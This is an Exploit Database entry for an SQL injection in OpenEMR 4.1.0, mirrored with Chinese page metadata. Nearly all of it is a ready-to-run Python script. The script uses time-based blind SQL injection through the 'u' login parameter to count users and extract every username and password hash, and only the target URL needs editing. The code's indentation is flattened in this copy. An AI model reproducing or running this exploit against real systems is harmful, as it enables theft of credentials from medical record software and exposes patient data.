OpenEMR 4.1.0 – ‘u’ SQL Injection

• Exploit Database
• 15 阅读

• 作者： Michael Ikua
  日期： 2021-04-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49742/

• # Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection
  # Date: 2021-04-03
  # Exploit Author: Michael Ikua
  # Vendor Homepage: https://www.open-emr.org/
  # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip
  # Version: 4.1.0
  # Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/
  
  #!/usr/bin/env python3
  
  import requests
  import string
  import sys
  
  print("""
   ____ _______________ __ __ ___ ____ 
  / __ \___________/ ____/|// __ \ / // /<// __ \\
   / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ // // /_/ // / / /
  / /_/ / /_/ /__/ / / / /___/ // / _, _//____/ / // /_/ / 
  \____/ .___/\___/_/ /_/_____/_//_/_/ |_| /_/ (_)_(_)____/
  /_/
  _______ __ _____ _______ 
   / __ )/ (_)_______/ // ___// __ \/ / (_)
  / /_/ / / / __ \/ __/ \__ \/ / / / / / / / 
   / /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ /
  /_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike 
  """)
  
  all = string.printable
  # edit url to point to your openemr instance
  url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u=" 
  
  def extract_users_num():
  print("[+] Finding number of users...")
  for n in range(1,100):
  payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\''
  r = requests.get(url+payload)
  if r.elapsed.total_seconds() > 3:
  user_length = n
  break
  print("[+] Found number of users: " + str(user_length))
  return user_length
  
  def extract_users():
  users = extract_users_num()
  print("[+] Extracting username and password hash...")
  output = []
  for n in range(1,1000):
  payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\''
  #print(payload)
  r = requests.get(url+payload)
  #print(r.request.url)
  if r.elapsed.total_seconds() > 3:
  length = n
  break
  for i in range(1,length+1):
  for char in all:
  payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\''
  #print(payload)
  r = requests.get(url+payload)
  #print(r.request.url)
  if r.elapsed.total_seconds() > 3:
  output.append(char)
  if char == ",":
  print("")
  continue
  print(char, end='', flush=True)
  
  
  try:
  extract_users()
  except KeyboardInterrupt:
  print("")
  print("[+] Exiting...")
  sys.exit()